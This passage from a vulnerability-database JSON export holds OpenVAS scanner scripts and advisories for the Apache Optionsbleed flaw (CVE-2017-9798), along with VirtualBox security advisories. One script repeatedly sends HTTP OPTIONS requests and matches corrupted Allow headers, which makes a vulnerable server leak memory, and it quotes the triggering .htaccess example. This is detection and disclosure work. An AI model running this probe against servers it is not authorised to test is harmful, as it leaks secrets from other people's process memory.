value:\"http://www.securityfocus.com/bid/100872\");\n script_xref(name:\"URL\", value:\"https://archive.apache.org/dist/httpd/patches/apply_to_2.2.34/\");\n script_xref(name:\"URL\", value:\"https://www.apache.org/dist/httpd/CHANGES_2.4.28\");\n\n script_tag(name:\"summary\", value:\"Apache HTTP server allows remote attackers to read secret data\n from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf\n has certain misconfigurations, aka Optionsbleed.\");\n\n script_tag(name:\"vuldetect\", value:\"This script checks for a corrupted Allow header that is being\n constructed in response to HTTP OPTIONS requests.\");\n\n script_tag(name:\"insight\", value:\"Optionsbleed is a use after free error in Apache HTTP server that\n causes a corrupted Allow header to be constructed in response to HTTP OPTIONS requests. This can leak\n pieces of arbitrary memory from the server process that may contain secrets. The memory pieces change\n after multiple requests, so for a vulnerable host an arbitrary number of memory chunks can be leaked.\n\n The bug appears if a webmaster tries to use the 'Limit' directive with an invalid HTTP method.\n\n Example .htaccess:\n\n <Limit abcxyz>\n </Limit>\");\n\n script_tag(name:\"impact\", value:\"The successful exploitation allows the attacker to read chunks of the\n host's memory.\");\n\n script_tag(name:\"affected\", value:\"Apache HTTP Server 2.2.x versions up to 2.2.34 and 2.4.x below 2.4.28.\");\n\n script_tag(name:\"solution\", value:\"Update to Apache HTTP Server 2.4.28. For Apache HTTP Server running\n version 2.2.34 apply the patch linked in the references.\n\n As a workaround the usage of .htaccess should be disabled competely via the 'AllowOverride None'\n directive within the webservers configuration. Furthermore all <Limit> statements within the\n webserver configuration needs to be verified for invalid HTTP methods.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE)) exit(0);\nget_app_location(cpe:CPE, port:port, nofork:TRUE); # To have a reference to the Detection-NVT\n\nuseragent = http_get_user_agent();\nhost = http_host_name(port:port);\n\n#TODO: Once this vulnerability got older we might want to consider to limit the amounts of directories to check here\nforeach dir(make_list_unique(\"/\", http_cgi_dirs(port:port)))\n{\n\n if(dir == \"/\") dir = \"\";\n url = dir + \"/\";\n\n req = 'OPTIONS ' + url + ' HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Connection: Close\\r\\n\\r\\n';\n\n for(i = 0; i <= 100; i++)\n {\n res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n if(res =~ \"^HTTP/1\\.[01] 405\" ) break; # We don't need to continue in this inner loop if the OPTIONS method is disabled.\n if(allow = egrep(string:res, pattern:\"^Allow: .*\" ))\n {\n # Examples:\n # Allow: POST,OPTIONS,,HEAD,:09:44 GMT\n # Allow: ,GET,HEAD,POST,OPTIONS\n # Allow: HEAD,,HEAD,POST,,HEAD,TRACE\n # Allow: POST,OPTIONS,GET,HEAD,,HEAD,write.c>\n if(vuln = eregmatch(pattern:\"(\\,{2,}|\\,\\W+\\,|^\\w+\\:[\\s]{0,}\\,|\\d)\", string:allow))\n {\n report = \"The remote service might leak data/memory via the 'Allow' header.\";\n report += '\\n\\nRequest:\\n' + req + '\\nResponse:\\n' + res;\n security_message(port:port, data:report);\n exit(0);\n }\n }\n }\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-29T20:09:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798"], "description": "Hanno Boeck discovered that incorrect parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.", "modified": "2020-01-29T00:00:00", "published": "2018-02-07T00:00:00", "id": "OPENVAS:1361412562310891102", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891102", "type": "openvas", "title": "Debian LTS: Security Advisory for apache2 (DLA-1102-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891102\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-9798\");\n script_name(\"Debian LTS: Security Advisory for apache2 (DLA-1102-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-02-07 00:00:00 +0100 (Wed, 07 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00019.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"apache2 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n2.2.22-13+deb7u12.\n\nWe recommend that you upgrade your apache2 packages.\");\n\n script_tag(name:\"summary\", value:\"Hanno Boeck discovered that incorrect parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-13+deb7u12\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-27T18:34:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171252", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171252", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2017-1252)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1252\");\n script_version(\"2020-01-23T11:01:27+0000\");\n script_cve_id(\"CVE-2017-9798\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:01:27 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:01:27 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2017-1252)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1252\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1252\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'httpd' package(s) announced via the EulerOS-SA-2017-1252 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\");\n\n script_tag(name:\"affected\", value:\"'httpd' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.6~45.0.1.4.h8\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.4.6~45.0.1.4.h8\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.4.6~45.0.1.4.h8\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.4.6~45.0.1.4.h8\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.4.6~45.0.1.4.h8\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798"], "description": "Hanno Boeck discovered that incorrect parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.", "modified": "2019-03-18T00:00:00", "published": "2017-09-20T00:00:00", "id": "OPENVAS:1361412562310703980", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703980", "type": "openvas", "title": "Debian Security Advisory DSA 3980-1 (apache2 - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_3980.nasl 14280 2019-03-18 14:50:45Z cfischer $\n#\n# Auto-generated from advisory DSA 3980-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703980\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2017-9798\");\n script_name(\"Debian Security Advisory DSA 3980-1 (apache2 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-20 00:00:00 +0200 (Wed, 20 Sep 2017)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3980.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(9|8)\");\n script_tag(name:\"affected\", value:\"apache2 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 2.4.10-10+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 2.4.25-3+deb9u3.\n\nWe recommend that you upgrade your apache2 packages.\");\n script_tag(name:\"summary\", value:\"Hanno Boeck discovered that incorrect parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-data\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dev\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-ssl-dev\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-pristine\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-data\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dev\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-pristine\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-macro\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-proxy-html\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "suse": [{"lastseen": "2018-04-24T05:30:38", "bulletinFamily": "unix", "cvelist": ["CVE-2018-2836", "CVE-2017-9798", "CVE-2018-2860", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2845", "CVE-2017-3737", "CVE-2018-2837", "CVE-2018-0739", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2843"], "description": "This update for VirtualBox to version 5.1.36 fixes multiple issues:\n\n Security issues fixed:\n\n - CVE-2018-0739: Unauthorized remote attacker may have caused a hang or\n frequently repeatable crash (complete DOS)\n - CVE-2018-2830: Attacker with host login may have compromised Virtualbox\n or further system services after interaction with a third user\n - CVE-2018-2831: Attacker with host login may have compromised VirtualBox\n or further system services, allowing read access to some data\n - CVE-2018-2835: Attacker with host login may have gained control over\n VirtualBox and possibly further system services after interacting with a\n third user\n - CVE-2018-2836: Attacker with host login may have gained control over\n VirtualBox and possibly further system services after interacting with a\n third user\n - CVE-2018-2837: Attacker with host login may have gained control over\n VirtualBox and possibly further system services after interacting with a\n third user\n - CVE-2018-2842: Attacker with host login may have gained control over\n VirtualBox and possibly further system services after interacting with a\n third user\n - CVE-2018-2843: Attacker with host login may have gained control over\n VirtualBox and possibly further system services after interacting with a\n third user\n - CVE-2018-2844: Attacker with host login may have gained control over\n VirtualBox and possibly further system services after interacting with a\n third user\n - CVE-2018-2845: Attacker with host login may have caused a hang or\n frequently repeatable crash (complete DOS), and perform unauthorized\n read and write operation to some VirtualBox accessible data\n - CVE-2018-2860: Privileged attacker may have gained control over\n VirtualBox and possibly further system services\n\n <a rel=\"nofollow\" href=\"http://www.oracle.com/technetwork/security-advisory/cpuapr2018verbose-36781\">http://www.oracle.com/technetwork/security-advisory/cpuapr2018verbose-36781</a>\n 08.html\n <a rel=\"nofollow\" href=\"http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html\">http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html</a>\n #AppendixOVIR\n\n This update also contains all upstream fixes and improvements in the\n stable 5.1.36 release.\n\n", "edition": 1, "modified": "2018-04-24T03:20:04", "published": "2018-04-24T03:20:04", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-04/msg00069.html", "id": "OPENSUSE-SU-2018:1057-1", "type": "suse", "title": "Security update for virtualbox (important)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-27T01:33:35", "bulletinFamily": "unix", "cvelist": ["CVE-2018-2836", "CVE-2018-3091", "CVE-2018-2687", "CVE-2018-2860", "CVE-2018-3055", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2698", "CVE-2018-2693", "CVE-2018-2845", "CVE-2018-2690", "CVE-2018-3086", "CVE-2018-2676", "CVE-2017-5715", "CVE-2018-2837", "CVE-2018-3089", "CVE-2018-0739", "CVE-2018-2688", "CVE-2018-3087", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2685", "CVE-2018-3085", "CVE-2018-2843", "CVE-2018-3005", "CVE-2018-3090", "CVE-2018-2686", "CVE-2018-2694", "CVE-2018-2689", "CVE-2018-3088"], "description": "This update for kbuild, virtualbox fixes the following issues:\n\n kbuild changes:\n\n - Update to version 0.1.9998svn3110\n - Do not assume glibc glob internals\n - Support GLIBC glob interface version 2\n - Fix build failure (boo#1079838)\n - Fix build with GCC7 (boo#1039375)\n - Fix build by disabling vboxvideo_drv.so\n\n virtualbox security fixes (boo#1101667, boo#1076372):\n\n - CVE-2018-3005\n - CVE-2018-3055\n - CVE-2018-3085\n - CVE-2018-3086\n - CVE-2018-3087\n - CVE-2018-3088\n - CVE-2018-3089\n - CVE-2018-3090\n - CVE-2018-3091\n - CVE-2018-2694\n - CVE-2018-2698\n - CVE-2018-2685\n - CVE-2018-2686\n - CVE-2018-2687\n - CVE-2018-2688\n - CVE-2018-2689\n - CVE-2018-2690\n - CVE-2018-2676\n - CVE-2018-2693\n - CVE-2017-5715\n\n virtualbox other changes:\n\n - Version bump to 5.2.16\n - Use %{?linux_make_arch} when building kernel modules (boo#1098050)\n - Fixed vboxguestconfig.sh script\n - Update warning regarding the security hole in USB passthrough.\n (boo#1097248)\n - Fixed include for build with Qt 5.11 (boo#1093731)\n - You can find a detailed list of changes\n [here](<a rel=\"nofollow\" href=\"https://www.virtualbox.org/wiki/Changelog#v16\">https://www.virtualbox.org/wiki/Changelog#v16</a>)\n\n", "edition": 1, "modified": "2018-08-27T00:07:57", "published": "2018-08-27T00:07:57", "id": "OPENSUSE-SU-2018:2524-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-08/msg00080.html", "title": "Security update for kbuild, virtualbox (important)", "type": "suse", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "kaspersky": [{"lastseen": "2020-09-02T11:49:10", "bulletinFamily": "info", "cvelist": ["CVE-2018-2836", "CVE-2018-2860", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2845", "CVE-2018-2837", "CVE-2018-0739", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2843"], "description": "### *Detect date*:\n04/17/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Oracle VM VirtualBox. Malicious users can exploit these vulnerabilities to cause denial of service, obtain sensitive information, gain privileges, read and write local files.\n\n### *Affected products*:\nOracle VM VirtualBox 5.1.x earlier than 5.1.36 \nOracle VM VirtualBox 5.2.x earlier than 5.2.10\n\n### *Solution*:\nUpdate to the latest version \n[Download VirtualBox](<https://www.virtualbox.org/wiki/Downloads>)\n\n### *Original advisories*:\n[Oracle Critical Patch Update Advisory \u2013 April 2018](<http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html#AppendixOVIR>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Oracle VirtualBox](<https://threats.kaspersky.com/en/product/Oracle-VirtualBox/>)\n\n### *CVE-IDS*:\n[CVE-2018-2835](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2835>)4.4Warning \n[CVE-2018-2836](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2836>)4.4Warning \n[CVE-2018-2837](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2837>)4.4Warning \n[CVE-2018-0739](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0739>)4.3Warning \n[CVE-2018-2842](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2842>)4.6Warning \n[CVE-2018-2843](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2843>)4.6Warning \n[CVE-2018-2844](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2844>)4.6Warning \n[CVE-2018-2845](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2845>)4.6Warning \n[CVE-2018-2860](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2860>)4.6Warning \n[CVE-2018-2830](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2830>)4.4Warning \n[CVE-2018-2831](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2831>)2.1Warning", "edition": 36, "modified": "2020-05-22T00:00:00", "published": "2018-04-17T00:00:00", "id": "KLA11236", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11236", "title": "\r KLA11236Multiple vulnerabilities in Oracle VM VirtualBox ", "type": "kaspersky", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-01T06:57:51", "description": "The version of Oracle VM VirtualBox running on the remote host is\n5.1.x prior to 5.1.36 or 5.2.x prior to 5.2.10. It is, therefore,\naffected by multiple vulnerabilities as noted in the April 2018\nCritical Patch Update advisory. Please consult the CVRF details\nfor the applicable CVEs for additional information.\n\nNessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 27, "cvss3": {"score": 8.2, "vector": "AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-05-10T00:00:00", "title": "Oracle VM VirtualBox 5.1.x < 5.1.36 / 5.2.x < 5.2.10 (April 2018 CPU)", "type": 